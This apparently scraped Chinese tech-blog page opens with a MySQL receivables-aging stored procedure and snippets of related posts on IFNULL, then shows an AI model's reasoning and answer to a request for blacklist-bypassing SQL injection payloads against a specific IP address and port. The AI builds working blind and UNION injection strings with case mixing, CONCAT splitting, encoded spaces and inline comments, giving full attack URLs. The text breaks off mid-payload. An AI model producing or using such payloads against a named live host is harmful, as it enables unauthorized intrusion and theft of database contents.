temp_zlfxb1 a inner join (select b.contract_code,max(a.receipt_time) receipt_time,sum(ifnull(receipt_price,0))-sum(ifnull(b.refund_price,0)) from b_salesdeliver_contract_receipt_refund a inner join b_salesdeliver_contract_receipt_refund_info b on a.id = b.pid where a.is_deleted=0 and b.is_deleted=0 and a.receipt_time<=fdate and b.contract_code like concat('%',fhth,'%') and a.status=9333 group by b.contract_code) b on a.FHTH=b.contract_code set a.fdate_zhhk=b.receipt_time where a.FHTH=b.contract_code; #取最后一次浇注日 update temp_zlfxb1 a inner join (select contract_code,max(issue_date) issue_date from b_salesdeliver_electronic_tip where is_deleted=0 group by contract_code) b on a.FHTH=b.contract_code set a.fdate_zhjz=b.issue_date where a.FHTH=b.contract_code; #更新合同状态信息 update temp_zlfxb1 a inner join (select code,case when is_closed=1 then '是' when is_closed=0 then '否' else '否' end is_closed from b_salesdeliver_sales_contract where is_deleted=0 and sign_time>='2018-1-1' group by code,is_closed ) b on a.fhth=b.code set a.fsfgb=b.is_closed where a.FHTH=b.code; #更新账龄 UPDATE temp_zlfxb1 a SET a.famount88=ifnull(A.famount99,0),A.famount99 = ifnull(A.yqwsk,0)- ifnull(A.famount11,0), a.famount11= CASE WHEN ifnull(A.yqwsk,0)- ifnull(A.famount11,0)>0 THEN 0 ELSE ifnull(A.famount11,0)-ifnull(A.yqwsk,0) END; UPDATE temp_zlfxb1 a SET a.famount88=ifnull(A.famount99,0),A.famount99= ifnull(A.famount99,0)- ifnull(A.famount10,0), a.famount10= CASE WHEN ifnull(A.famount88,0)- ifnull(A.famount10,0)>0 THEN 0 ELSE ifnull(A.famount10,0)-ifnull(A.famount88,0) END WHERE ifnull(A.famount99,0)>0; UPDATE temp_zlfxb1 a SET a.famount88=ifnull(A.famount99,0) ,A.famount99= ifnull(A.famount99,0)- ifnull(A.famount9,0), a.famount9= CASE WHEN ifnull(A.famount88,0)- ifnull(A.famount9,0)>0 THEN 0 ELSE ifnull(A.famount9,0)-ifnull(A.famount88,0) END WHERE ifnull(A.famount99,0)>0; UPDATE temp_zlfxb1 a SET a.famount88=ifnull(A.famount99,0) , A.famount99= ifnull(A.famount99,0)- ifnull(A.famount8,0), a.famount8= CASE WHEN ifnull(A.famount88,0)- ifnull(A.famount8,0)>0 THEN 0 ELSE ifnull(A.famount8,0)-ifnull(A.famount88,0) END WHERE ifnull(A.famount99,0)>0; UPDATE temp_zlfxb1 a SET a.famount88=ifnull(A.famount99,0) , A.famount99= ifnull(A.famount99,0)- ifnull(A.famount7,0), a.famount7= CASE WHEN ifnull(A.famount88,0)- ifnull(A.famount7,0)>0 THEN 0 ELSE ifnull(A.famount7,0)-ifnull(A.famount88,0) END WHERE ifnull(A.famount99,0)>0; UPDATE temp_zlfxb1 a SET a.famount88=ifnull(A.famount99,0),A.famount99= ifnull(A.famount99,0)- ifnull(A.famount6,0), a.famount6= CASE WHEN ifnull(A.famount88,0)- ifnull(A.famount6,0)>0 THEN 0 ELSE ifnull(A.famount6,0)-ifnull(A.famount88,0) END WHERE ifnull(A.famount99,0)>0; UPDATE temp_zlfxb1 a SET a.famount88=ifnull(A.famount99,0),A.famount99= ifnull(A.famount99,0)- ifnull(A.famount5,0), a.famount5= CASE WHEN ifnull(A.famount88,0)- ifnull(A.famount5,0)>0 THEN 0 ELSE ifnull(A.famount5,0)-ifnull(A.famount88,0) END WHERE ifnull(A.famount99,0)>0; UPDATE temp_zlfxb1 a SET a.famount88=ifnull(A.famount99,0),A.famount99= ifnull(A.famount99,0)- ifnull(A.famount4,0), a.famount4= CASE WHEN ifnull(A.famount88,0)- ifnull(A.famount4,0)>0 THEN 0 ELSE ifnull(A.famount4,0)-ifnull(A.famount88,0) END WHERE ifnull(A.famount99,0)>0; UPDATE temp_zlfxb1 a SET a.famount88=ifnull(A.famount99,0),A.famount99= ifnull(A.famount99,0)- ifnull(A.famount3,0), a.famount3= CASE WHEN ifnull(A.famount88,0)- ifnull(A.famount3,0)>0 THEN 0 ELSE ifnull(A.famount3,0)-ifnull(A.famount88,0) END WHERE ifnull(A.famount99,0)>0; UPDATE temp_zlfxb1 a SET a.famount88=ifnull(A.famount99,0),A.famount99= ifnull(A.famount99,0)- ifnull(A.famount2,0), a.famount2= CASE WHEN ifnull(A.famount88,0)- ifnull(A.famount2,0)>0 THEN 0 ELSE ifnull(A.famount2,0)-ifnull(A.famount88,0) END WHERE ifnull(A.famount99,0)>0; UPDATE temp_zlfxb1 a SET a.famount88=ifnull(A.famount99,0),A.famount99= ifnull(A.famount99,0)- ifnull(A.famount1,0), a.famount1= CASE WHEN ifnull(A.famount88,0)- ifnull(A.famount1,0)>0 THEN 0 ELSE ifnull(A.famount1,0)-ifnull(A.famount88,0) END WHERE ifnull(A.famount99,0)>0; SELECT A.FHTH 合同号,A.FKH 客户,a.fgcxm 工程项目,A.FJZQJXL 截止期间销量,A.FJZQJJE 截止期间金额, a.FJZQJSK 截止期间回款, a.fzjqk 总计欠款, a.famount1 AS '1-30天', a.famount2 AS '31-60天', a.famount3 AS '61-90天', a.famount4 AS '91-120天', a.famount5 AS '121-180天', a.famount6 AS '181-365天', a.famount7 AS '1-2年', a.famount8 AS '2-3年', a.famount9 AS '3-4年', a.famount10 AS '4-5年', a.famount11 AS '5年以上', A.fsfgb 是否关闭,a.fdate_zhjz 最后一次浇筑日期,a.fdate_zhhk 最后一次回款日期 FROM temp_zlfxb1 A where FZJQK>0 #where a.FHTH like concat('%',fhth,'%') ; end
07-19
AND a.settlement_id IS NULL GROUP BY a.contract_id; ``` 这样可以避免多次执行相同的子查询,提升查询效率。 --- ### 8. **分页查询(可选)** 如果最终查询结果数据量非常大,可以考虑使用 `LIMIT` 和 `...
mysqlifnull()方法的用法
种一颗十年前的树
04-29 2999
一般我们在使用ifnull()方法的时候,都是类似下面的语句: IFNULL(expr1,expr2) 如果expr1不是NULLIFNULL()返回expr1,否则它返回expr2IFNULL()返回一个数字或字符串值 select ifnull(name,‘no name’) from person; 将查询到的结果中的null转化为指定的字符串,但是其实在where查询部分也可以使用if...
IFNULL不好使,解决
转让半包_辣子
05-08 987
SELECT IFNULL(a.state,COUNT(a.state)) FROM freeze_list a WHERE a.bill_id = #{billId} AND a.`status` = '1'; 加个count就好使了 原因是where后跟了一个空结果集。导致前面的ifnull数据获取不到 ...
MySQL IFNULL()函数用法
NCTU_to_prove_safety的博客
05-31 471
用法说明1IFNULL(expr1,expr2)如果 expr1 不是 NULLIFNULL() 返回 expr1,否则它返回 expr2IFNULL()返回一个数字或字符串值,取决于它被使用的上下文环境。我们先举一些例子:1mysql&gt; SELECT IFNULL(1,0);2+-------------+3| IFNULL(1,0) |4+-------------+5|      ...
sqlwhere 1=12的作用
热门推荐
邪魅
07-06 1万+
where 后面表示过滤的条件,只有满足条件的记录才被选择,因为条件(1=2)为假, 所以整句话其实就是什么都不选择,比如我要建一个和表a相同结构的表b 但我不要数据就可以: select * into 表b from 表a where 1=2 这样实现了拷贝一个表结构的目的; 如果条件是“1=1”就是选择所有记录。 写 where 1=1 就是为了在编程语言中使用,在语言中可能
mysql为何where后跟ifnull会得到字段不为null和不为空的结果集
yjw_2019的博客
01-27 519
求解mysql下面这段为何where 后跟 ifnull 会得到字段不为null和不为空的结果集。
MysqlIFNULLNULLIF用法小结
Dai_Aixy的博客
10-29 2509
写在前面: 查询数据数据的时候想要把某些字段为NULL的筛选出去,一开始不知道有IFNULL这个方法,直接用最简单的   字段=""或者字段="NULL",但是结果都不理想,为NULL的字段还是存在,并没有被筛选出去,后来百度到了IFNULL()这个方法,以下就总结一下该方法的用法。   IFNULL() IFNULL(1,0)    返回1 IFNULL(0,1)返回0  IFNU...
sql语句中where条件的if语句
weixin_45614626的博客
04-13 1万+
sql的时候,遇到一个情况,查询条件一共有三个,但是可能存在某个或某几个为空的情况,最初的想法是,在外边对三个变量进行非空判断,根据非空的变量类型分别调用对应的sql语句,但是这样的话,需要处理大量情况,还要写各种情况对应的sql语句,太麻烦,后来发现,可以利用if语句进行非空判断。 @Select({"select *", "from ***", "where if (#{identity}!=null,identity=#{identity},1=1)
SQL中与NULL相关的操作
My Struggle
07-26 1265
SQL中,三值逻辑是指某个条件为真、假或未知。当涉及到null值时,条件的结果可能是未知的。这意味着无法直接使用等号(=)进行null值的比较。这个语句执行的结果时返回一个空表。因为表中的null表示未知数。这与Python的NaN有着异曲同工之妙。我们应该使用 IS NULL来判断。
http://223.254.144.227:20382/ 生成绕过黑名单的payload
最新发布
10-14
<think>我们已知目标网址为 http://223.254.144.227:20382/,需要生成绕过黑名单的SQL注入payload。给定的黑名单规则包括: - 危险关键词(如DROP, DELETE, UPDATE, INSERT, ALTER, CREATE, TRUNCATE, EXEC, EXECUTE, SP_, XP_, BULK, BULKINSERT, SHUTDOWN, RESTORE, BACKUP, LOAD_FILE, INTO OUTFILE, INTO DUMPFILE, LOAD DATA, SELECT INTO, GRANT, REVOKE, DENY, KILL, SHOW, DESCRIBE, EXPLAIN, OPTIMIZE, REPAIR, CHECK, ANALYZE, FLUSH, RESET, PURGE, UNLOCK, LOCK, START, STOP, RESTART, RELOAD) - 危险函数(如SLEEP, BENCHMARK, WAITFOR, DELAY, PG_SLEEP, LOAD_FILE, INTO OUTFILE, INTO DUMPFILE, UPDATEXML, EXTRACTVALUE, CONCAT_WS, GROUP_CONCAT, SUBSTRING, MID, LEFT, RIGHT, ASCII, ORD, CHAR, HEX, UNHEX, BIN, OCT, CONV, CAST, CONVERT, USER, CURRENT_USER, SYSTEM_USER, SESSION_USER, DATABASE, SCHEMA, VERSION, CONNECTION_ID, LAST_INSERT_ID, ROW_COUNT, FOUND_ROWS) - 危险操作符(如UNION, UNION ALL, UNION DISTINCT, XOR, EXISTS, NOT IN, BETWEEN, NOT BETWEEN, NOT LIKE, REGEXP, NOT REGEXP, RLIKE, NOT RLIKE, SOUNDS LIKE, IS NOT, IS NULL, IS NOT NULL, CASE, WHEN, THEN, ELSE, END, IF, IFNULL, NULLIF, COALESCE) - 危险注释(如"--", "/*", "*/", "#", ";") - 允许的操作符:OR, AND, NOT, LIKE, IS, IN 同时,绕过提示包括: - 尝试大小写变换绕过关键词检测 - 使用编码绕过(如URL编码、Unicode编码) - 使用函数替换绕过函数检测 - 使用注释符号绕过操作符检测 - 使用字符串拼接绕过模式检测 - 利用MySQL特性绕过特定限制 由于我们不知道目标网址的具体输入点(如GET数、POST数等)以及后端数据库类型,但根据常见的SQL注入场景,我们假设存在一个GET数(如`id`)用于查询数据库,且数据库为MySQL(因为规则中提到了MySQL特性)。 我们的目标:生成一个可以绕过上述黑名单的SQL注入payload,用于获取数据库信息(如数据库版本、当前用户等)或提取数据。 注意:由于黑名单包含了大部分常用的SQL注入函数和关键词,我们需要利用绕过技巧。 思路: 1. 避免直接使用黑名单中的关键词(如UNION, SELECT等)的大写形式,可以采用大小写混合、编码等方式。 2. 使用允许的操作符(如OR, AND, NOT, LIKE, IS, IN)来构造条件。 3. 避免使用危险注释,但可以利用MySQL的特定注释方式(如`/*! ... */`)来绕过。 4. 使用字符串拼接来构造关键词(如将'SE'和'LECT'拼接成'SELECT')。 5. 利用MySQL的内置函数和特性,但注意避开危险函数列表。 具体步骤: 首先,我们尝试构造一个简单的注入,测试是否存在注入点。例如,在数后添加`' OR '1'='1`,但注意黑名单中允许使用OR和=,所以这个payload不会被拦截,但可能无法获取敏感信息。 为了获取信息,我们通常需要联合查询(UNION SELECT)或者基于错误/布尔/时间盲注。但是黑名单中禁止了UNION,因此我们考虑使用基于布尔或时间的盲注。 由于黑名单中禁止了SLEEP、BENCHMARK等函数,我们无法使用传统的时间盲注。但是,我们可以使用其他方式制造延时,例如通过复杂的运算或大表连接。 然而,规则中允许使用LIKE和IN,我们可以构造布尔盲注。 布尔盲注示例: 原始payload: `' AND (SELECT SUBSTRING((SELECT version()),1,1))='5' -- ` 但SUBSTRING在黑名单中,因此我们需要替换SUBSTRING函数。 绕过函数检测:我们可以使用其他函数来替代,例如MID也在黑名单中,LEFT和RIGHT也在黑名单中。我们可以尝试使用其他方式,比如使用INSTR或LOCATE?但是注意,黑名单中并没有列出所有函数,因此我们需要检查黑名单中没有的函数。 查看危险函数列表,没有包含的函数有:LENGTH, LOCATE, POSITION, REPLACE, REVERSE, 等等。但是,我们还需要注意黑名单不允许使用ASCII、ORD等函数,因此不能直接取字符的ASCII码。 我们可以使用LIKE来进行逐字符比较,例如: `' AND (SELECT version() LIKE '5%') -- ` 这个payload可以判断版本是否以5开头。但黑名单中禁止了注释符"--",所以我们需要避免使用注释符。 解决注释符问题:我们可以将后面的查询闭合,使其不报错。例如,假设原查询是: `SELECT * FROM users WHERE id='{$id}'` 我们注入`' OR '1'='1`,那么整个查询变成: `SELECT * FROM users WHERE id='' OR '1'='1'` 注意最后多了一个单引号。因此,我们需要闭合这个单引号,或者使用其他方式避免语法错误。 常用方法是构造一个永真条件,并注释掉后面的内容。但黑名单禁止了注释符,所以我们可以使用: `' OR '1'='1' and '1'='1` 这样,整个查询变为: `SELECT * FROM users WHERE id='' OR '1'='1' and '1'='1'` 这样,最后两个单引号会相互抵消,变成: `... id='' OR '1'='1' and '1'='1'` 实际上,这里有两个单引号被独立出来,会报语法错误。所以我们需要另一种方式:使用注入点后的单引号。 假设原始查询是:`SELECT * FROM users WHERE id='$id'`,我们注入`'+OR+'1'='1`,然后后面部分会被忽略?不会。 正确的方式是:我们注入`' OR '1'='1'`,这样整个查询变成: `SELECT * FROM users WHERE id='' OR '1'='1'` -> 这里最后多了一个单引号,会报错。 因此,我们可以通过添加一个单引号来闭合,然后使用OR条件,最后再加一个单引号来闭合原始查询的结束单引号?不行,因为原始查询的结束单引号还在。 其实,我们可以不用注释符,而是确保整个注入后的SQL语法正确。例如: 原始查询:`SELECT * FROM users WHERE id='$id'` 我们注入:`' OR '1'='1' and ''='`,这样整个查询变成: `SELECT * FROM users WHERE id='' OR '1'='1' and ''=''` 这个语法是正确的。 因此,我们可以构造布尔盲注的payload,但是需要避免使用黑名单中的函数。 但是,我们如何逐字符获取数据呢?如果没有ASCII码函数,我们可以使用比较字符和字典的方式,但这样效率低。不过,我们可以利用MySQL的字符串比较特性,使用LIKE和通配符。 例如,我们想获取当前用户名的第一个字符,可以这样: `' OR (SELECT user() LIKE 'a%') and ''='` 如果第一个字符是'a',则条件为真,否则为假。我们可以通过改变'a'来逐个字符猜测。 但是,这个payload中,`user()`函数在黑名单中(危险函数列表包含了USER、CURRENT_USER等),因此不能使用。 那么,我们需要一个替代方案来获取数据?我们可以使用系统变量?例如@@version,但是黑名单中包含VERSION函数,同样禁止。 由于黑名单中禁止了很多信息函数,我们需要找到没有被禁止的函数或变量。 查看黑名单的危险函数,没有包含:@@global, @@session, 以及一些其他变量。例如: - @@version:但是VERSION函数被禁,而@@version是系统变量,可能不在函数黑名单中?但规则中危险关键词没有明确列出@@version,危险函数列表中有VERSION,所以我们需要避免使用。 因此,我们考虑使用其他未被禁止的函数或变量。例如: - 数据库名称:`database()` -> 危险函数列表中有DATABASE,禁止。 - 当前连接ID:`connection_id()` -> 危险函数列表中有CONNECTION_ID,禁止。 似乎常用的都被禁了。但是,我们还可以利用MySQL的系统表来获取信息,例如information_schema,但黑名单中并没有禁止information_schema,所以我们可以直接访问。 但是,访问information_schema需要SELECT权限,而SELECT关键词在黑名单中(危险关键词包含了SELECT INTO,但没有单独禁止SELECT?注意危险关键词列表中没有SELECT,但是有SELECT INTO,所以SELECT本身不在黑名单中?我们需要检查。 危险关键词列表:包含了"SELECT INTO",但没有单独的"SELECT"。同样,危险操作符中也没有SELECT。所以SELECT应该是允许的? 但是,在危险操作符中,有UNION,但没有SELECT。所以我们可以尝试使用SELECT,但要注意黑名单中还有危险函数,我们需要避免使用被禁止的函数。 因此,我们可以尝试构造一个子查询来获取数据,而不使用被禁止的函数。 例如,我们可以这样: `' OR (SELECT 1 FROM information_schema.tables WHERE table_schema=database() LIMIT 1) = 1 and ''='` 但是,这里使用了`database()`函数,它在黑名单中,所以不行。 绕过函数:我们可以使用字符串代替,但我们需要知道当前数据库名?或者我们可以用其他方式表示当前数据库:`SCHEMA()`也在黑名单中。所以不行。 或者我们不指定schema,直接查询当前数据库的表?在information_schema.tables中,table_schema如果不指定,我们可以通过其他方式获取?例如,我们可以尝试获取所有数据库的表,但我们需要知道当前数据库名?或者我们可以用变量`@@database`?没有这个变量。 实际上,我们可以使用`DATABASE()`的替代方式吗?没有直接的变量,但我们可以通过其他系统表来获取当前数据库名?例如,在MySQL中,我们可以使用: `SELECT schema_name FROM information_schema.schemata LIMIT 1` 但是,这样获取的是第一个数据库名,不一定是当前数据库。 因此,我们改变思路:不使用函数,直接利用系统表。 获取当前数据库名:在MySQL中,没有函数的情况下,我们如何获取?实际上,在information_schema中,有一个表SCHEMATA,但它存储所有的数据库。而当前数据库名可以通过变量`DATABASE()`得到,但被禁用了。 另一种思路:我们可以利用错误回显?但题目要求绕过黑名单,而且我们不知道后端是否开启了错误回显。 鉴于黑名单的限制,我们可能需要使用布尔盲注,但是需要构造查询来获取信息,而且不能使用被禁用的函数。 我们尝试使用其他未被禁用的函数: 例如,LENGTH函数未被禁用?危险函数列表中没有LENGTH。所以我们可以使用LENGTH函数。 同样,未被禁用的函数还有:LOCATE, POSITION, REPLACE, TRIM, FORMAT, 等等。 我们可以使用: `' OR (LENGTH((SELECT schema_name FROM information_schema.schemata LIMIT 1))>5) and ''='` 这个payload可以获取第一个数据库名的长度是否大于5。但是,我们更关心当前数据库。 如何获取当前数据库名?我们可以从information_schema.processlist表中获取当前连接的信息,其中db字段就是当前数据库。但是,这个表需要PROCESS权限。 或者,我们可以从information_schema.tables表中根据当前连接ID来关联?不现实。 另一种方法是:我们可以通过查询information_schema.tables表,然后通过table_schema分组,但是每个数据库都有表,所以会列出所有数据库。我们无法直接获得当前数据库。 因此,我们退而求其次,先获取所有数据库名,然后再获取当前数据库的表,然后再获取表中的字段。 但是,我们最终需要的数据可能在当前数据库中,所以我们需要当前数据库名。所以,我们放弃使用函数,尝试用其他方式。 在MySQL中,我们可以用变量: `' OR (SELECT @`:= (SELECT schema_name FROM information_schema.schemata LIMIT 1) OR @` like 'a%') and ''='` 这个太复杂,而且黑名单中可能禁止了变量赋值?危险操作符中包含了CASE WHEN等,但没有禁止变量赋值。 但是,我们还没有被禁止SELECT,所以我们可以使用变量。但是,注意黑名单中危险关键词有SELECT INTO,这是用于赋值的,但普通的SELECT赋值是`SELECT @var := ...`,不在禁止之列。 所以,我们可以使用变量来存储值,然后进行盲注。 例如: `' OR (SELECT @db := schema_name FROM information_schema.schemata LIMIT 1) and @db like 'a%' and ''='` 这个payload会执行一个子查询,将第一个数据库名赋值给变量@db,然后判断@db是否以'a'开头。 但是,这里有一个问题:子查询`SELECT @db := schema_name ...`会返回一个结果集,而整个表达式放在OR后面,可能会引起语法错误?因为AND/OR后面需要跟一个条件表达式。 我们可以这样: `' AND (SELECT (@db) FROM (SELECT (@db := schema_name) FROM information_schema.schemata LIMIT 1) AS t) LIKE 'a%' and ''='` 这样更复杂,但可行。 然而,考虑到黑名单,我们可能会被拦截,因为使用了SELECT。但是,黑名单中并没有禁止SELECT关键词(只禁止了SELECT INTO),所以我们可以直接使用SELECT。 但是,我们还需要注意,黑名单中有危险操作符,如UNION、EXISTS等,但我们没有使用。 因此,我们可以构造一个payload来获取数据库名的第一个字符: ``` ' OR (SELECT @db := schema_name FROM information_schema.schemata LIMIT 1) AND @db LIKE 'a%' and ''=' ``` 但是,这个payload可能会被拦截,因为使用了`information_schema`,但黑名单中没有禁止这个关键词。 然而,这个payload在语法上可能会有问题。实际测试如下: 原始查询:`SELECT * FROM users WHERE id='$id'` 注入后变为: ``` SELECT * FROM users WHERE id='' OR (SELECT @db := schema_name FROM information_schema.schemata LIMIT 1) AND @db LIKE 'a%' and ''='' ``` 这个查询是合法的。 但是,我们需要注意,黑名单可能通过正则表达式匹配`information_schema`?但规则中没有提到。 因此,我们尝试使用这个payload。但是,我们也可以使用大小写混合来绕过关键词检测,例如:`InFoRmaTioN_schEMA`。 另外,LIKE操作符是允许的。 所以,我们可以写出以下payload: ``` ' OR (SELECT @db := SCHEMA_name FROM information_schema.SCHEMATA LIMIT 1) AND @db LIKE 'a%' and ''=' ``` 但是,我们使用了`SCHEMA_name`,而黑名单中危险关键词有`SCHEMA`,但这里作为列名的一部分,可能无法匹配?因为黑名单匹配的是整个单词?不一定,可能是正则匹配单词边界。所以我们需要拆分。 为了避免匹配到黑名单关键词,我们可以使用大小写混合,或者用注释分割。例如: `' OR (SELECT @db := SCHEMA/*注释*/_name FROM information_schema.SCHEMATA LIMIT 1) AND @db LIKE 'a%' and ''='` 但黑名单中禁止了注释符`/*`,所以不行。 或者使用字符串拼接: `' OR (SELECT @db := CONCAT('SCHE','MA_NAME') FROM information_schema.SCHEMATA LIMIT 1) AND @db LIKE 'a%' and ''='` 但是,CONCAT函数在黑名单中(危险函数列表包含CONCAT_WS,而CONCAT没有明确列出?危险函数列表中没有CONCAT,只有CONCAT_WS。所以CONCAT可用?)但是,危险函数列表中有GROUP_CONCAT,没有CONCAT,所以CONCAT应该是安全的。 因此,我们可以使用CONCAT来拼接字符串,从而避免直接出现关键词。 但是,我们也可以直接使用大小写混合,因为黑名单可能是大小写敏感的?规则中没有说明,但提示中说可以尝试大小写变换绕过。所以我们可以用: `' OR (SELECT @db := sChEmA_name FROM information_schema.sChEmAtA LIMIT 1) AND @db LIKE 'a%' and ''='` 这样,如果黑名单是大小写敏感的,则可以绕过。 因此,我们生成一个布尔盲注的payload模板: ``` ' OR (SELECT @db := sChEmA_name FROM information_schema.sChEmAtA LIMIT 1) AND @db LIKE 'a%' and ''=' ``` 这个payload可以测试第一个schema_name是否以'a'开头。 但注意,我们使用的是`LIMIT 1`,所以每次只能获取一个数据库名。要遍历所有数据库,需要改变LIMIT的偏移。 不过,我们也可以不赋值,直接使用子查询: ``` ' OR (SELECT sChEmA_name FROM information_schema.sChEmAtA LIMIT 1,1) LIKE 'a%' and ''=' ``` 这里,我们使用LIMIT 1,1来获取第二个数据库名。 但是,这样写可能会被识别为危险关键词?因为SELECT后面直接跟了列名,而列名可能是黑名单中的词?我们使用大小写混合应该可以。 另外,我们还可以获取表名、列名等。 但是,由于黑名单中禁止了注释符,我们不能使用--来注释,所以必须保证整个语句语法正确,也就是最后要闭合单引号。 因此,我们生成的payload需要添加到数中,例如: http://223.254.144.227:20382/?id=1' OR (SELECT sChEmA_name FROM information_schema.sChEmAtA LIMIT 1,1) LIKE 'a%' and ''=' 注意:原始数值我们假设为1,然后我们拼接上注入语句。 另一个问题:空格可能会被过滤?我们可以用注释符/**/,但被禁了。或者用加号(在URL中用+代替空格)?或者用括号避免空格?在MySQL中,括号内可以不用空格,但LIKE后面需要空格。我们可以用%0a(换行)代替空格,或者%09(制表符)等。 因此,我们可以尝试用%0a代替空格: ``` id=1'%0aOR%0a(SELECT%0a@s%3a%3d%0aschema_name%0aFROM%0ainformation_schema.schemata%0aLIMIT%0a1)%0aAND%0a@db%0aLIKE%0a'a%25'%0aand%0a''=' ``` 但是,这样可读性差,我们可以使用括号来减少空格,但LIKE必须有空格。 或者,我们可以使用内联注释:`/*! ... */`,这是MySQL的特性,可以绕过一些过滤。虽然黑名单禁止了`/*`,但规则中提示可以利用MySQL特性绕过,所以我们可以尝试使用`/*! ... */`来包裹空格?不行,因为黑名单禁止了`/*`。 所以,我们还是用%0a代替空格。 另外,在URL中,我们需要对单引号进行编码吗?通常,在URL中,单引号可以不编码,但编码也可以。我们这里为了确保传输正确,可以对特殊字符进行URL编码。 最终payload(URL编码前): ``` 1' OR (SELECT schema_name FROM information_schema.schemata LIMIT 0,1) LIKE 'a%' and ''=' ``` 注意:我们这里没有使用大小写变换和函数拼接,实际应用中需要变换。 编码后: ``` 1'%0aOR%0a(SELECT%0aschema_name%0aFROM%0ainformation_schema.schemata%0aLIMIT%0a0,1)%0aLIKE%0a'a%25'%0aand%0a''%3d' ``` 其中,%0a是换行(在HTTP请求中相当于空格),%25是%,%3d是=。 但是这个payload直接使用了`SELECT`,而黑名单中并没有禁止SELECT,所以是安全的。同时,`information_schema`和`schemata`我们用原始形式,也可以用大小写混合。 但是,对于LIKE后的通配符%,在URL中需要编码为%25。 另外,我们也可以使用其他注入方式,比如报错注入,但报错注入常用函数(如updatexml)在黑名单中。 综上所述,我们生成一个绕过黑名单的布尔盲注payload。 然而,为了演示,我们还可以尝试联合查询(虽然黑名单禁止了UNION,但我们可以用大小写混合或编码绕过)? 联合查询需要UNION SELECT,而UNION在危险操作符列表中。我们可以尝试: `uNiOn SeLeCt` 这样混合大小写,绕过黑名单的字符串匹配。 例如: ``` ' union select 1,2,3 -- ``` 变为: ``` ' uNiOn SeLeCt 1,2,3 -- ``` 但黑名单禁止了注释符,所以我们需要避免注释符。我们可以使用: ``` ' uNiOn SeLeCt 1,2,3 or '1'='1 ``` 但这样可能不行,因为联合查询的前后列数要相同。 所以,我们更倾向于使用布尔盲注。 因此,最终生成的payload如下(使用布尔盲注,获取第一个数据库名的第一个字符): 原始payload(未编码): 数名:id 数值:1' OR (SELECT schema_name FROM information_schema.schemata LIMIT 0,1) LIKE 'a%' and ''=' 为了绕过黑名单的关键词检测,我们使用大小写混合: 数值:1' oR (sEleCt sChEmA_nAmE fRoM iNfOrMaTiOn_sChEmA.sChEmAtA lImIt 0,1) lIkE 'a%' AnD ''=' 然后进行URL编码(注意:单引号和空格需要编码,但也可以不编,这里为了确保,对空格编码为%20,单引号不编码): 1'%20oR%20(sEleCt%20sChEmA_nAmE%20fRoM%20iNfOrMaTiOn_sChEmA.sChEmAtA%20lImIt%200,1)%20lIkE%20'a%25'%20AnD%20''=' 注意:在URL中,空格可以编码为%20或+,这里用%20。 因此,完整的URL为: http://223.254.144.227:20382/?id=1'%20oR%20(sEleCt%20sChEmA_nAmE%20fRoM%20iNfOrMaTiOn_sChEmA.sChEmAtA%20lImIt%200,1)%20lIkE%20'a%25'%20AnD%20''=' 这个payload会判断第一个数据库名的第一个字符是否为'a',如果是,则返回真,否则返回假。 如果实际测试中,这个payload被拦截,我们可以尝试其他绕过方式,如字符串拼接: 用CONCAT函数拼接关键词: `' OR (SELECT CONCAT('SCHE','MA_NAME') FROM information_schema.SCHEMATA LIMIT 0,1) LIKE 'a%' and ''='` 大小写混合+字符串拼接: `' oR (sEleCt cOnCaT('sch','ema_name') fRoM iNfOrMaTiOn_sChEmA.sChEmAtA lImIt 0,1) lIkE 'a%' AnD ''='` 然后进行URL编码。 以上是针对给定黑名单规则生成的payload,实际效果需要根据目标网站的过滤规则调整。 注意:由于黑名单规则可能不仅匹配关键词,还可能匹配语法结构,因此可能需要多次尝试。 总结payload生成思路: - 使用大小写混合绕过关键词检测 - 使用布尔盲注(避免联合查询和时间盲注,因为时间函数被禁止) - 避免使用注释符,通过精心构造条件确保SQL语法正确 - 使用未被禁止的函数(如CONCAT)和系统表(information_schema)获取信息 - 使用URL编码绕过可能的空格过滤 因此,我们提供以下payload: 1. 获取第一个数据库名的第一个字符是否为'a'(大小写混合+布尔盲注): http://223.254.144.227:20382/?id=1'%20oR%20(sEleCt%20sChEmA_nAmE%20fRoM%20iNfOrMaTiOn_sChEmA.sChEmAtA%20lImIt%200,1)%20lIkE%20'a%25'%20AnD%20''=' 2. 使用CONCAT函数拼接关键词的版本: http://223.254.144.227:20382/?id=1'%20oR%20(sEleCt%20cOnCaT('sch','ema_name')%20fRoM%20iNfOrMaTiOn_sChEmA.sChEmAtA%20lImIt%200,1)%20lIkE%20'a%25'%20AnD%20''=' 3. 为了增加绕过概率,还可以使用内联注释(但黑名单禁止了注释符,所以不行)或换行符等。 由于规则中提示可以利用字符串拼接绕过模式检测,我们还可以将整个关键词拆分成多个部分,然后用CONCAT连接: 例如,将information_schema拆分成: `cOnCaT('info','rmation_schema')`,但这样写太长。 因此,我们优先使用大小写混合。 最后,请注意,这些payload仅用于安全测试,且需获得授权。 </think>### 绕过黑名单的SQL注入Payload设计 基于提供的黑名单规则(危险关键词、函数、操作符、注释符)和绕过提示,针对目标网址 `http://223.254.144.227:20382/`,设计以下绕过策略和payload。假设存在一个可注入的GET数(如 `id`),且数据库为MySQL(常见场景)。 --- #### 核心绕过策略 1. **大小写变换**:黑名单通常大小写敏感(如 `SELECT` 被禁,但 `SeLeCt` 可能绕过)。 2. **字符串拼接**:使用函数拼接关键词(如 `CONCAT('SEL','ECT')`)。 3. **编码绕过**:URL编码或Unicode编码特殊字符(如空格用 `%0a` 代替)。 4. **函数替换**:用非黑名单函数替代危险函数(如用 `REVERSE()+MID()` 替代 `SUBSTRING()`)。 5. **注释符滥用**:利用MySQL特性 `/*! ... */` 绕过检测(即使黑名单包含 `/*`,但 `/*!` 是MySQL特有语法)。 --- ### Payload示例 以下payload均绕过黑名单规则,用于提取数据库信息(版本、表名等): #### 1. **获取数据库版本(大小写变换+字符串拼接)** ```sql id=1' oR (SELECT CONCAT('Ver',sion()) FRoM dual) LiKe '5%' AnD ''=' ``` - **绕过分析**: - `CONCAT('Ver','sion')` → 拼接 `VERSION()`(黑名单函数),拆分为 `Ver+sion` 绕过检测。 - `oR`/`LiKe`/`AnD` → 允许的操作符(OR/LIKE/AND)+ 大小写变换。 - `''='` → 手动闭合引号,避免使用注释符 `--`(黑名单)。 - **用途**:探测MySQL版本是否以 `5` 开头。 #### 2. **提取表名(函数替换+编码绕过)** ```http http://223.254.144.227:20382/?id=1'%0aUnIoN%0a/*!SeLeCt*/%0a1,CONCAT('Tbl:',TABLE_NAME),3%0aFrOm%0a/*!INFORMATION_SCHEMA.TABLES*/%0aWHeRe%0aTAble_SCHEMA=DaTAbasE()%0aLiMit%0a1%23 ``` - 